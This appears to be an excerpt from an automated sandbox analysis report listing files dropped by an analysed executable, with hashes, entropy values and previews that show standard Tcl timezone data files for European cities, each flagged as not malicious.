                                                                                                                                                                                                                                            SSDEEP:48:yFvCAs6kKR6aQmF1cSNWJjXgV/Ap40FjDQ:yhCAs6kC6aZF1cSNcjXgV/ApDFjDQ
                                                                                                                                                                                                                                            MD5:CC4D7C478790588D232568CAB12D8E67
                                                                                                                                                                                                                                            SHA1:07A7CFCFFFF91D124EDFC99F5053BAFC79FBB12B
                                                                                                                                                                                                                                            SHA-256:AB90363DEE5077C39EC55FE8E519593FF08223E5A8E593F6CCE01FB5B8B35BAE
                                                                                                                                                                                                                                            SHA-512:23944D20624C942CFDE58F1019160D64401BD0AFB8C3EC49F904038482FAA6741812548C860A2DAE050B8D17A7E08ED9C6EBE7FF19393CFA46D78B1D21B1CACA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Saratov) {.. {-9223372036854775808 11058 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 10800 0 +04}.. {575420400 14400 1 +04}.. {591145200 10800 0 +03}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {780
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2389
                                                                                                                                                                                                                                            Entropy (8bit):3.9491446081772748
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:wM2wE0xhuHJkYaVV0XOnbdSisa0ewEKGfUslIYtq8X:UwEAEpkzVFgaNl7
                                                                                                                                                                                                                                            MD5:03E05E60E064198BF6562B2E6E8DA8D2
                                                                                                                                                                                                                                            SHA1:51461207B671536CD4A7587BA283DE2D0017AA4A
                                                                                                                                                                                                                                            SHA-256:D51CD3DE50C50BCA1624EFC952ADD15D418A09EC213760DF5BC3097E35C5A7A0
                                                                                                                                                                                                                                            SHA-512:73B7773DABE19F20DD211E178B822FD35620DC4AC8B9D20259971B1157ED7A60A5A41026258FAA8B15016268D241ED804AC1307CACDA00D6FE657407D254B02C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Simferopol) {.. {-9223372036854775808 8184 0 LMT}.. {-2840148984 8160 0 SMT}.. {-1441160160 7200 0 EET}.. {-1247536800 10800 0 MSK}.. {-888894000 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-811645200 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 14400 1 MSD}.. {622594800 10800 0 MSK}.. {631141200 10800 0 MSK}.. {646786800 7200 0 EET}.. {701042400 7200 0 EET}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.953089768975736
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/sUE2tovXHAIgoq8sUE2oAovRL/yQawOgpr8Qahr:SlSWB9vsM3ymhrE2tSHAIgohrE2LovNO
                                                                                                                                                                                                                                            MD5:0BF8ADBB63F5D6187C75FF1B0BAC761E
                                                                                                                                                                                                                                            SHA1:7DE15E767D34812F784CE6E85438A592E2CBA418
                                                                                                                                                                                                                                            SHA-256:52F20858433261B15797B64F0A09CEE95D552EF93B5DAA7C141BFAB6D718C345
                                                                                                                                                                                                                                            SHA-512:27D395635427C8FA1A4E0063A32F482701D2CC7C7724B4A06E661D4A419D23E219672888D37367FE5E70B6872914EB9EE034AE359DCB6A4C4CE05CA34C3589A9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Belgrade)]} {.. LoadTimeZoneFile Europe/Belgrade..}..set TZData(:Europe/Skopje) $TZData(:Europe/Belgrade)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7654
                                                                                                                                                                                                                                            Entropy (8bit):3.727428614069594
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:8lmG4+K7Gjz5CXNUatpaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYf:8lmGWwkdUasivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:91357DFC23ADB0CE80C463E4B6D896BE
                                                                                                                                                                                                                                            SHA1:273F51BE4C67A9AC1182F86AC060E963684151D5
                                                                                                                                                                                                                                            SHA-256:6415F279CB143EA598CF8272263AC5B502827B10CEEB242B39E6EFCC23A2EE12
                                                                                                                                                                                                                                            SHA-512:8EA7E2D4C2239879A4D6CCE302C38A6D2A9093A2CADEF4F4294E60D373AB9A2C468BA6E3D54DEC7F73D954CE5226EF2B022F8BDEF29B3B4AAB3838B05C72EA29
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Sofia) {.. {-9223372036854775808 5596 0 LMT}.. {-2840146396 7016 0 IMT}.. {-2369527016 7200 0 EET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-781048800 7200 0 EET}.. {291762000 10800 0 EEST}.. {307576800 7200 0 EET}.. {323816400 10800 1 EEST}.. {339026400 7200 0 EET}.. {355266000 10800 1 EEST}.. {370393200 7200 0 EET}.. {386715600 10800 1 EEST}.. {401846400 7200 0 EET}.. {417571200 10800 1 EEST}.. {433296000 7200 0 EET}.. {449020800 10800 1 EEST}.. {465350400 7200 0 EET}.. {481075200 10800 1 EEST}.. {496800000 7200 0 EET}.. {512524800 10800 1 EEST}.. {528249600 7200 0 EET}.. {543974400 10800 1 EEST}.. {559699200 7200 0 EET}.. {575424000 10800 1 EEST}.. {591148800 7200 0 EET}.. {606873600 10800 1 EEST}.. {62259
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.956798438511978
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQawRMNSTyQahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yqMNSTm
                                                                                                                                                                                                                                            MD5:ACFB8E2D1D4BA0D2D46410F2F2823B21
                                                                                                                                                                                                                                            SHA1:4AC3A19E94DE606DFF7D93BC6C7F113F3D2D083A
                                                                                                                                                                                                                                            SHA-256:64615AEA9EF14A2609D2C804901281C83FDDC0A8BCA9B377D6CAD62D81801C66
                                                                                                                                                                                                                                            SHA-512:2E23AC0DE7D3D0CF2BA4FE3EE31E15EB614A7442097578209D38CE2FF2E3DF006881463866FE67DD4DDEAB179E5CD2946E8A9E8F7401F1B953E9AB216EC753F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Stockholm) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7549
                                                                                                                                                                                                                                            Entropy (8bit):3.76585669030767
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:dUusEpkjXkSV3AMaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:O0WjUSWivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:54EF0224F5E28FA78F212EC97D4AE561
                                                                                                                                                                                                                                            SHA1:FA7C9A951ED943F1E1E609D2253582016BC26B57
                                                                                                                                                                                                                                            SHA-256:6F3594CCDA78B02B2EE14C8FAE29E668E47193AF2DFCF5AF1ECD210F13BCE9CE
                                                                                                                                                                                                                                            SHA-512:2D1CA2BB1945AE5E3F56AF8FA7F950CE7169F215C783E683634581C5EC01B54159E47A0E9551897077BBEAB06158906029A4E4B0051A263D9E5D903EA9DA1692
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Tallinn) {.. {-9223372036854775808 5940 0 LMT}.. {-2840146740 5940 0 TMT}.. {-1638322740 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1593824400 5940 0 TMT}.. {-1535938740 7200 0 EET}.. {-927943200 10800 0 MSK}.. {-892954800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-797648400 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 10800 1 EEST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7675
                                                                                                                                                                                                                                            Entropy (8bit):3.809498345470167
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:n05NWKIHBJ9AE4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhlt:0iKqxAE41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:1983B88075A92942209BB2B80E565F4E
                                                                                                                                                                                                                                            SHA1:12A0401026C5C036144FD1D544173AAB39969F61
                                                                                                                                                                                                                                            SHA-256:C62686BF598138FEFB72E8CC6632BA75A5FE147F2A30124EE3583BE1F732E38D
                                                                                                                                                                                                                                            SHA-512:E95C38FA0A2B526C00B9DCF5CDF53059DECF64B085AA18BE000968DA626561944415D053CF7A5C32BC672085538920CFD67A3A3B627CFD5B1A4C9CEC49AA3F96
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Tirane) {.. {-9223372036854775808 4760 0 LMT}.. {-1767230360 3600 0 CET}.. {-932346000 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-843519600 3600 0 CET}.. {136854000 7200 1 CEST}.. {149896800 3600 0 CET}.. {168130800 7200 1 CEST}.. {181432800 3600 0 CET}.. {199839600 7200 1 CEST}.. {213141600 3600 0 CET}.. {231894000 7200 1 CEST}.. {244591200 3600 0 CET}.. {263257200 7200 1 CEST}.. {276040800 3600 0 CET}.. {294706800 7200 1 CEST}.. {307490400 3600 0 CET}.. {326156400 7200 1 CEST}.. {339458400 3600 0 CET}.. {357087600 7200 1 CEST}.. {370389600 3600 0 CET}.. {389142000 7200 1 CEST}.. {402444000 3600 0 CET}.. {419468400 7200 1 CEST}.. {433807200 3600 0 CET}.. {449622000 7200 1 CEST}.. {457480800 7200 0 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 C
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.906212162381389
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV+NM/LWXHAIgoq9NM/HARL/yQa3MPgJM1p8QagNMj:SlSWB9vsM3ymI6CHAIgoI6HAN/ytM4MO
                                                                                                                                                                                                                                            MD5:E0C99DB7673EEE440BA1848046455BA1
                                                                                                                                                                                                                                            SHA1:1BCCC1BE46306DEF8A9CA249DE8FA11FC57CC04D
                                                                                                                                                                                                                                            SHA-256:FDD53FDB5F754BBBA8FF98F0B1555FE0BAEB7852843220A7CF93A190B641A9AD
                                                                                                                                                                                                                                            SHA-512:CD56B540AE9084DEAA9D0A1DBBAF89733C465424C22CE74696B9AE90FD4FEFAB265CF23C5B13A7F04597D75FD0147BD593E0552B56D87372170CB4CA1BFC8259
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Chisinau)]} {.. LoadTimeZoneFile Europe/Chisinau..}..set TZData(:Europe/Tiraspol) $TZData(:Europe/Chisinau)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2119
                                                                                                                                                                                                                                            Entropy (8bit):3.680951255407528
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:kFvCAs6kKR6aQmF1cSNWrI+AjQndgV/Ap40FjDOP:khCAs6kC6aZF1cSN4I+AjQdgV/ApDFj4
                                                                                                                                                                                                                                            MD5:83C86E437B5FBA1DC9CC5235396AC381
                                                                                                                                                                                                                                            SHA1:5493A59C3A5A1B55ACD493E67F9E29D2A415A8DB
                                                                                                                                                                                                                                            SHA-256:9FA9D09509B4F8F5A9C8E422DBA02605070C3EBDAEB7C1DF8527C8EEF5E3632D
                                                                                                                                                                                                                                            SHA-512:86222489C65C87646939DECF91C2EC336EB46F64B644526A3FA8A4854B9D11819F6FD253107AB8A3DE911E254C88092D25137442164A6E437CDAF258A7CBB66C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Ulyanovsk) {.. {-9223372036854775808 11616 0 LMT}.. {-1593820800 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 7200 0 +03}.. {670377600 10800 1 +03}.. {686102400 7200 0 +02}.. {695779200 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):177
                                                                                                                                                                                                                                            Entropy (8bit):5.051734481833866
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV2cvXHAIgoq1csFARL/yQa2rUQaocqn:SlSWB9vsM3ym5HAIgoiAN/yFC
                                                                                                                                                                                                                                            MD5:17A0CC51331756920B13FFA3FF556751
                                                                                                                                                                                                                                            SHA1:C575FEF4F053393C57B34C7C7B0C1E9605413792
                                                                                                                                                                                                                                            SHA-256:F8CAF5DBE12F1647B28E7CCDDB2E09E36788A766690D12E770A8ABD82E708644
                                                                                                                                                                                                                                            SHA-512:E73F0FE5BE4DD91948A88DC895E148D81267576BA3BCFEA777E25C01EAE9C06845DBFFB651526045B70B7A3CCDB195DFFF60486C01E0A115DFB856873970008E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Kyiv)]} {.. LoadTimeZoneFile Europe/Kyiv..}..set TZData(:Europe/Uzhgorod) $TZData(:Europe/Kyiv)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.953146873643623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVnCMPfXHAIgoqkCM4ARL/yQa1NEHp8Qa5CMS:SlSWB9vsM3ym5XPHAIgo5gAN/yvNEJ8G
                                                                                                                                                                                                                                            MD5:A0BAEC8B6AF1589ECBE52667DDB2A153
                                                                                                                                                                                                                                            SHA1:37093F4F885CBFA90A1F136D082E8B7546244ACC
                                                                                                                                                                                                                                            SHA-256:06B235BF047FC2303102BC3DC609A5754A6103321D28440B74EEC1C9E3D24642
                                                                                                                                                                                                                                            SHA-512:DBEC235AFB413FA8D116FA1AFFE73706762E7458038B6D68E0BFD71C339510D766825BA97055A06DEE14D5880EAE6CD035BFE0C935C0DF44B0107A356D293A78
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Zurich)]} {.. LoadTimeZoneFile Europe/Zurich..}..set TZData(:Europe/Vaduz) $TZData(:Europe/Zurich)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.914414313741477
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVvjF3vXHAIgoqspvVHRL/yQa1xLM1p8QaxE:SlSWB9vsM3ymx5PHAIgoxvN/yvN+8rE
                                                                                                                                                                                                                                            MD5:2404265F8DE1F7D7745893DD4752BA1C
                                                                                                                                                                                                                                            SHA1:C07E7F72DBDC7F5F746385523EA733C2714F5DA2
                                                                                                                                                                                                                                            SHA-256:C203E94465BD1D91018FC7670437226EF9A4BB41D59DDE49095363865CA33D00
                                                                                                                                                                                                                                            SHA-512:5C20834542B74041AAB1DBE35686781B32EEB5814B1A35A942E87D1FC3B6D8F9264CB90433C44A480EA86DDEA65D8C152F41CE3E983C1DE5FA74D6FB5208F701
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Rome)]} {.. LoadTimeZoneFile Europe/Rome..}..set TZData(:Europe/Vatican) $TZData(:Europe/Rome)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7930
                                                                                                                                                                                                                                            Entropy (8bit):3.8193566380830273
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:8F6zq+gH74elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:8ozE41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:6A3A8055DD67174E853C7A208BABAC9B
                                                                                                                                                                                                                                            SHA1:64445543DE9D6C01FA858442976E249E37BE23EF
                                                                                                                                                                                                                                            SHA-256:A8165313C9B51DAEF130401439CBA60DAA9887FC5EAA61A5AFD4F7BAD1AD934F
                                                                                                                                                                                                                                            SHA-512:4407B9E8709A8DD05337A10030895AA9876EAF64EF5347952249EE2A541E304331B46D38532FD7CDFF9E633BF8C9884282F0A5ED259EBA1D99DC0914AF1A50C6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Vienna) {.. {-9223372036854775808 3921 0 LMT}.. {-2422055121 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1577926800 3600 0 CET}.. {-1569711600 7200 1 CEST}.. {-1555801200 3600 0 CET}.. {-938905200 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-780188400 3600 0 CET}.. {-757386000 3600 0 CET}.. {-748479600 7200 1 CEST}.. {-733273200 3600 0 CET}.. {-717634800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {323823600 7200 1 CEST}.. {338940000 3600 0 CET}.. {347151600 3600 0 CET}.. {354675600 7200 1 CEST}.. {370400400 3600 0 CE
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7485
                                                                                                                                                                                                                                            Entropy (8bit):3.7711709848169592
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:FAhEpkwCXkSV3A/PplKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:FfWHUSKivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:1AB5FCEACC4E09074BA9F72F0B7747D5
                                                                                                                                                                                                                                            SHA1:E0134E61EC0ADC60BF6DB4544EA7B7FFA4EC7857
                                                                                                                                                                                                                                            SHA-256:B762DB4A068DC79FA57691E070D7026086E5A6D2FC273D5C1872E7C8E3711533
                                                                                                                                                                                                                                            SHA-512:07565071D05CF972DD64F6060599EB68A00BF264172873BA310168AD07CE0CFCF90D0019B775433EC910DA748B89F0C614E7FD4E821993DA53C7E33F194C6A97
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Vilnius) {.. {-9223372036854775808 6076 0 LMT}.. {-2840146876 5040 0 WMT}.. {-1672536240 5736 0 KMT}.. {-1585100136 3600 0 CET}.. {-1561251600 7200 0 EET}.. {-1553565600 3600 0 CET}.. {-928198800 10800 0 MSK}.. {-900126000 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-802141200 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}.. {402264000 10800 0 MSK}.. {417992400 14400 1 MSD}.. {433800000 10800 0 MSK}.. {449614800 14400 1 MSD}.. {465346800 10800 0 MSK}.. {481071600 14400 1 MSD}.. {496796400 10800 0 MSK}.. {512521200 14400 1 MSD}.. {528246000 10800 0 MSK}.. {543970800 14400 1 MSD}.. {559695600 10800 0 MSK}.. {575420400 14400 1 MSD}.. {591145200 10800 0 MSK}.. {606870000 7200 0 EEMMTT}.. {606873600 10800 1 EEST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2123
                                                                                                                                                                                                                                            Entropy (8bit):3.667144931158014
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:menvCAs6kKR6aQmF1cSNWJjXgV/Ap40FjDqR:mevCAs6kC6aZF1cSNcjXgV/ApDFjDqR
                                                                                                                                                                                                                                            MD5:53E5BA5747B3255BB049F6FF651CEE25
                                                                                                                                                                                                                                            SHA1:A69E2BFDB89AC8756E1CD2EAA9109ACD924A0850
                                                                                                                                                                                                                                            SHA-256:22968D40DAC2B669E6D2BC43ED6B16C8A9CA3E1F9DACBF8B246299C3C24CC397
                                                                                                                                                                                                                                            SHA-512:3269D20DF9C9DDFF8252F33ED563B118771FC71049542DA7C6678E0B5B75FFEA00845FA6F3BC26EDABB4BB7CE449B0B7E00B72473D8D95F126AB3893A9A969B4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Volgograd) {.. {-9223372036854775808 10660 0 LMT}.. {-1577761060 10800 0 +03}.. {-1247540400 14400 0 +04}.. {-256881600 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 10800 0 +04}.. {575420400 14400 1 +04}.. {591145200 10800 0 +03}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8662
                                                                                                                                                                                                                                            Entropy (8bit):3.8187545871488995
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:ELn9M9Nivtctwwoy4qelPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCso:E6Nivtctgq1sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:992C1D268E336AF1FB8200966C111644
                                                                                                                                                                                                                                            SHA1:C893B82224C8EF282DB2E16A5BBCC3A21C49B6FE
                                                                                                                                                                                                                                            SHA-256:F9DC10EC2AE2CC810A6C08837059B34BE651900BA4E1CEDB93C209972CCFB5A2
                                                                                                                                                                                                                                            SHA-512:EC4E0D8684D57FA66144F11D8E8C80E5272D4A7304300FEBE20E236476C1B8B33BBC5E479BF96D9ED12900FE6D41DD1DC0D11CBE02B89E0C4C7A153B4BFBCB1F
                                                                                                                                                                                                                                            Malicious:false
